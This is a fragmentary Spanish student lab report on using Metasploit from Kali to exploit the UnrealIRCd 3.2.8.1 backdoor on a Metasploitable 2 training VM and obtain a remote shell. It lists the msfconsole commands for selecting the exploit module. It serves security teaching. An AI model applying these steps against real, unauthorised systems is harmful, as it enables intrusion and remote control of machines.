Taller Metasploit - Metasploitable
Taller Metasploit - Metasploitable
Taller Metasploit - Metasploitable
Taller Metasploit
Describir el proceso realizado para aplicar un exploit desde Metasploit 5 en Kali a una máquina virtual
Metasploitable 2.
db_status
Andrés Esteban Peña Piarpusan, I044216
workspace
5. Crear un nuevo espacio de trabajo con el nombre ‘test’ y revisar que este esté activo.
workspace -a test
ifconfig
Andrés Esteban Peña Piarpusan, I044216
ping 192.168.56.101
10. Utilizar nmap para obtener la información de la versión de los diferentes servicios activos en la
máquina.
12. Realizar una búsqueda en la libreria de Metasploit para los posibles exploits disponibles para el
servicio UnrealIRCd en el puerto 6667.
search UnrealIRCD
use exploit/unix/irc/unreal_ircd_3281_backdoor
info
show payloads
Andrés Esteban Peña Piarpusan, I044216
21. Si el exploit fue exitoso, se creará una sesión del shell en la máquina objetivo.
22. Para comprobar el acceso, se realiza ping desde la máquina objetivo hacia la máquina local.
Andrés Esteban Peña Piarpusan, I044216